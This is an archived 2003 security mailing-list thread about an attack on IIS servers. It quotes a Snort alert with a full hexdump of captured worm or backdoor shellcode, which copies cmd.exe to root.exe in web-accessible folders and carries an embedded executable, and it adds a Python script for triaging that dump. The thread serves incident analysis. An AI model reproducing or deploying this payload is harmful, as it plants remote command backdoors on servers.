We saw the exact same packets attack our network from 3 different hosts. It appears that somehow this attack successfully breached a "hardened" IIS box. URLScan reported several instances of typical Code Red-type traffic from the attacking IPs, and although the IIS log was scrubbed of some suspicious activity, our syslogs and IDS indicated that the attack was successful. Any info on these attack packets would be greatly appreciated.

Regards.

Shane

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Shane MacDougall
Lead Security Officer
ID Analytics
San Diego, California USA
Direct: (858) 427-2860
Toll Free: 866-240-4484 x 2860
Fax: 858-427-2899

-----Original Message-----
From: Q [mailto:quentyn@the-q.co.uk]
Sent: Thursday, May 29, 2003 12:10 PM
To: incidentsat_private
Subject: strange cmd.exe access

Hi

I saw this packet:

#(3 - 261684) [2003-05-09 19:43:00] [snort/1002] WEB-IIS cmd.exe access
IPv4: 194.204.X.X -> X.X.X.X
      hlen=5 TOS=0 dlen=1472 ID=57174 flags=0 offset=0 TTL=116 chksum=60435
TCP:  port=27761 -> dport: 80  flags=***A**** seq=915915841
      ack=1210973630 off=5 res=0 win=17184 urp=0 chksum=16151
Payload:  length = 1432

000 : FF 75 FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C .u..U..E......Gl
010 : 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 FF 75 FC obalAddAtomA..u.
020 : FF 55 F8 89 45 D4 E8 0C 00 00 00 43 6C 6F 73 65 .U..E......Close
030 : 48 61 6E 64 6C 65 00 FF 75 FC FF 55 F8 89 45 D0 Handle..u..U..E.
040 : E8 08 00 00 00 5F 6C 63 72 65 61 74 00 FF 75 FC ....._lcreat..u.
050 : FF 55 F8 89 45 CC E8 08 00 00 00 5F 6C 77 72 69 .U..E......_lwri
060 : 74 65 00 FF 75 FC FF 55 F8 89 45 C8 E8 08 00 00 te..u..U..E.....
070 : 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC FF 55 F8 89 ._lclose..u..U..
080 : 45 C4 E8 0E 00 00 00 47 65 74 53 79 73 74 65 6D E......GetSystem
090 : 54 69 6D 65 00 FF 75 FC FF 55 F8 89 45 C0 E8 0B Time..u..U..E...
0a0 : 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00 FF 55 ...WS2_32.DLL..U
0b0 : F4 89 45 BC E8 07 00 00 00 73 6F 63 6B 65 74 00 ..E......socket.
0c0 : FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 00 00 63 6C .u..U..E......cl
0d0 : 6F 73 65 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 osesocket..u..U.
0e0 : 89 45 B4 E8 0C 00 00 00 69 6F 63 74 6C 73 6F 63 .E......ioctlsoc
0f0 : 6B 65 74 00 FF 75 BC FF 55 F8 89 45 A4 E8 08 00 ket..u..U..E....
100 : 00 00 63 6F 6E 6E 65 63 74 00 FF 75 BC FF 55 F8 ..connect..u..U.
110 : 89 45 B0 E8 07 00 00 00 73 65 6C 65 63 74 00 FF .E......select..
120 : 75 BC FF 55 F8 89 45 A0 E8 05 00 00 00 73 65 6E u..U..E......sen
130 : 64 00 FF 75 BC FF 55 F8 89 45 AC E8 05 00 00 00 d..u..U..E......
140 : 72 65 63 76 00 FF 75 BC FF 55 F8 89 45 A8 E8 0C recv..u..U..E...
150 : 00 00 00 67 65 74 68 6F 73 74 6E 61 6D 65 00 FF ...gethostname..
160 : 75 BC FF 55 F8 89 45 9C E8 0E 00 00 00 67 65 74 u..U..E......get
170 : 68 6F 73 74 62 79 6E 61 6D 65 00 FF 75 BC FF 55 hostbyname..u..U
180 : F8 89 45 98 E8 10 00 00 00 57 53 41 47 65 74 4C ..E......WSAGetL
190 : 61 73 74 45 72 72 6F 72 00 FF 75 BC FF 55 F8 89 astError..u..U..
1a0 : 45 94 E8 0B 00 00 00 55 53 45 52 33 32 2E 44 4C E......USER32.DL
1b0 : 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 00 45 78 69 L..U..E......Exi
1c0 : 74 57 69 6E 64 6F 77 73 45 78 00 FF 75 90 FF 55 tWindowsEx..u..U
1d0 : F8 89 45 8C C3 8B 45 84 69 C0 05 84 08 08 40 89 ..E...E.i.....@.
1e0 : 45 84 8D 84 04 78 56 34 12 F7 D8 C1 C0 08 C3 E8 E....xV4........
1f0 : E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 C3 E8 ED FF ....<.t.<.t.....
200 : FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 E3 10 E8 DC ................
210 : FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 E8 B4 FF FF ................
220 : FF 83 E0 07 E8 20 00 00 00 FF FF FF FF 00 FF FF ..... ..........
230 : FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 00 FF ................
240 : FF 00 00 FF FF 00 00 FF FF 59 8B 04 81 23 D8 F7 .........Y...#..
250 : D0 23 85 58 FE FF FF 0B D8 80 FB 7F 74 9F 80 FB .#.X......t...
260 : E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 68 04 01 00 .t.;.X...t..h...
270 : 00 8D 85 5C FE FF FF 50 FF 55 E0 8D BC 05 5C FE ...\...P.U....\.
280 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00 .......\CMD.EXE.
290 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A ^.....cj......d:
2a0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \inetpub\scripts
2b0 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D \root.exe...$...
2c0 : 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 00 00 .\...P.U.j..+...
2d0 : 64 3A 5C 70 72 6F 67 72 61 7E 31 5C 63 6F 6D 6D d:\progra~1\comm
2e0 : 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 41 44 on~1\system\MSAD
2f0 : 43 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 C\root.exe...$..
300 : 8D 85 5C FE FF FF 50 FF 55 DC E8 BA 05 00 00 FC ..\...P.U.......
310 : 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 MZP.............
320 : B8 00 00 00 00 00 00 00 40 00 1A FC 00 00 01 FC ........@.......
330 : FC FC FC FC FC 00 00 50 45 00 00 4C 01 03 00 FD .......PE..L....
340 : 2A 25 29 00 00 00 00 00 00 00 00 E0 00 8F 81 0B *%)............
350 : 01 02 19 00 04 00 00 00 08 00 00 00 00 00 00 00 ................
360 : 10 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 ........ ....@..
370 : 10 00 00 00 04 00 00 01 00 00 00 00 00 00 00 03 ................
380 : 00 0A 00 00 00 00 00 00 40 00 00 00 04 00 00 00 ........@.......
390 : 00 00 00 02 00 00 00 00 00 10 00 00 20 00 00 00 ............ ...
3a0 : 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 ................
3b0 : 00 00 00 00 00 00 00 00 30 00 00 0C 01 FC FC FC ........0.......
3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3d0 : 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 10 ................
3e0 : 00 00 00 04 00 00 00 08 00 00 00 00 00 00 00 00 ................
3f0 : 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 ...... ..`......
400 : 00 00 00 10 00 00 00 20 00 00 00 04 00 00 00 0C ....... ........
410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 ..............@.
420 : 00 C0 00 00 00 00 00 00 00 00 00 10 00 00 00 30 ...............0
430 : 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00 ................
440 : 00 00 00 00 00 00 40 00 00 C0 FC FC FC FC FC FC ......@.........
450 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
460 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
470 : FC FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00 ................
480 : 00 00 00 00 00 00 68 04 01 00 00 68 D0 20 40 00 ......h....h. @.
490 : E8 61 01 00 00 8D B8 D0 20 40 00 BE 00 20 40 00 .a...... @... @.
4a0 : A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 4C 01 00 00 ....j.h. @..L...
4b0 : E8 0C 00 00 00 68 C0 27 09 00 E8 31 01 00 00 EB .....h.'...1....
4c0 : EF 68 D8 24 40 00 68 3F 00 0F 00 6A 00 68 10 20 .h.$@.h?...j.h. 
4d0 : 40 00 68 02 00 00 80 E8 32 01 00 00 0B C0 75 26 @.h.....2.....u&
4e0 : 6A 04 68 54 20 40 00 6A 04 6A 00 68 48 20 40 00 j.hT @.j.j.hH @.
4f0 : FF 35 D8 24 40 00 E8 0D 01 00 00 FF 35 D8 24 40 .5.$@.......5.$@
500 : 00 E8 0E 01 00 00 68 D8 24 40 00 68 3F 00 0F 00 ......h.$@.h?...
510 : 6A 00 68 58 20 40 00 68 02 00 00 80 E8 ED 00 00 j.hX @.h........
520 : 00 0B C0 75 55 BD 9C 20 40 00 E8 4C 00 00 00 BD ...uU.. @..L....
530 : A8 20 40 00 E8 42 00 00 00 6A 09 68 B8 20 40 00 . @..B...j.h. @.
540 : 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 24 40 00 E8 j.j.h. @..5.$@..
550 : B4 00 00 00 6A 09 68 C4 20 40 00 6A 01 6A 00 68 ....j.h. @.j.j.h
560 : B4 20 40 00 FF 35 D8 24 40 00 E8 99 00 00 00 FF . @..5.$@.......
570 : 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 05 D0 24 40 5.$@..........$@
580 : 00 00 04 00 00 68 D0 24 40 00 68 D0 20 40 00 68 .....h.$@.h. @.h
590 : D4 24 40 00 6A 00 55 FF .$@.j.U.

What is strange is that the cmd.exe / root.exe stuff is half way through, with some other code before it. The IP it hit was not mapped to anything (I believe it is unused), so this can not have been part of another TCP conversation.

Any ideas?
--
There should be a sig here, but it got bored and wandered off
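Editor's note: the following is an added worked example, not code posted by either participant. It shows the first triage step a practitioner would apply to a dump like the one above: rebuild the payload bytes from the Snort hexdump rows, pull out the NUL-terminated strings that each `E8 rel32` (x86 `call`) skips over (a `call` that jumps just past a string leaves that string's address on the stack as its return address, which is how position-independent code commonly references names without relocations), and locate the embedded `MZ` / `PE\0\0` markers. The excerpt embedded below is a constructed subset of the rows quoted in the thread (000-010, 280-2f0, 310-340); the parser zero-fills the rows that were left out so offsets match the original dump, which is an assumption of this example, not something the dump itself states. The `locate_pe` check only reports whether the `e_lfanew` field read from the carved `MZ` header points at the `PE\0\0` signature that actually follows it; it makes no claim about why the two disagree.

```python
import re
import struct

# Constructed excerpt of the Snort payload dump quoted in the thread: rows 000-010,
# 280-2f0 and 310-340 of the original 1432-byte payload. Rows not shown here are
# zero-filled by the parser (an assumption of this example) so offsets line up.
DUMP_EXCERPT = r"""
000 : FF 75 FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C .u..U..E......Gl
010 : 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 FF 75 FC obalAddAtomA..u.
280 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00 .......\CMD.EXE.
290 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A ^.....cj......d:
2a0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \inetpub\scripts
2b0 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D \root.exe...$...
2c0 : 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 00 00 .\...P.U.j..+...
2d0 : 64 3A 5C 70 72 6F 67 72 61 7E 31 5C 63 6F 6D 6D d:\progra~1\comm
2e0 : 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 41 44 on~1\system\MSAD
2f0 : 43 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 C\root.exe...$..
310 : 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 MZP.............
320 : B8 00 00 00 00 00 00 00 40 00 1A FC 00 00 01 FC ........@.......
330 : FC FC FC FC FC 00 00 50 45 00 00 4C 01 03 00 FD .......PE..L....
340 : 2A 25 29 00 00 00 00 00 00 00 00 E0 00 8F 81 0B *%)............
"""

# One dump row: hex offset, colon, up to 16 hex byte pairs. The ASCII column that
# follows the 16th pair is ignored, so it cannot be mistaken for data.
ROW_RE = re.compile(r"^\s*([0-9A-Fa-f]{3,4})\s*:\s*((?:[0-9A-Fa-f]{2}\s+){1,16})")


def parse_hexdump(text):
    """Rebuild payload bytes from Snort/hexdump-style rows, zero-filling any gaps."""
    buf = bytearray()
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        offset = int(m.group(1), 16)
        data = bytes.fromhex(m.group(2))
        if offset > len(buf):
            buf.extend(b"\x00" * (offset - len(buf)))  # rows omitted from the excerpt
        buf[offset:offset + len(data)] = data
    return bytes(buf)


def find_call_over_strings(data, max_len=64):
    """Return (offset, string) for every E8 rel32 whose target skips exactly one
    NUL-terminated printable string, i.e. the call-over-string idiom."""
    hits = []
    for i in range(len(data) - 5):
        if data[i] != 0xE8:
            continue
        rel = struct.unpack_from("<i", data, i + 1)[0]
        if not 2 <= rel <= max_len or i + 5 + rel > len(data):
            continue
        s = data[i + 5:i + 5 + rel]
        if s[-1] == 0 and all(0x20 <= b <= 0x7E for b in s[:-1]):
            hits.append((i, s[:-1].decode("ascii")))
    return hits


def locate_pe(data):
    """Find an embedded DOS/PE header and check whether e_lfanew (offset 0x3C of
    the MZ header) actually points at the 'PE\\0\\0' signature that follows it."""
    mz = data.find(b"MZ")
    if mz < 0:
        return None
    pe = data.find(b"PE\x00\x00", mz)
    e_lfanew = None
    if mz + 0x40 <= len(data):
        e_lfanew = struct.unpack_from("<I", data, mz + 0x3C)[0]
    consistent = pe >= 0 and e_lfanew is not None and mz + e_lfanew == pe
    return {"mz": mz, "pe": pe, "e_lfanew": e_lfanew, "consistent": consistent}


if __name__ == "__main__":
    payload = parse_hexdump(DUMP_EXCERPT)
    for off, name in find_call_over_strings(payload):
        print(f"{off:04x}: {name}")
    print(locate_pe(payload))
```

Run against the full dump (paste all rows into `DUMP_EXCERPT`), `find_call_over_strings` lists every API and DLL name the first part of the payload references, the `\CMD.EXE` string, and both `root.exe` paths, in the order they appear; on the excerpt the `e_lfanew` read from the carved `MZ` header does not point at the `PE\0\0` at `0x337`, which is a sign that the bytes from `0x310` on are not a plain PE image as transmitted and should not be carved and run through a PE parser as-is.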
This archive was generated by hypermail 2b30 : Thu Jun 05 2003 - 08:51:34 PDT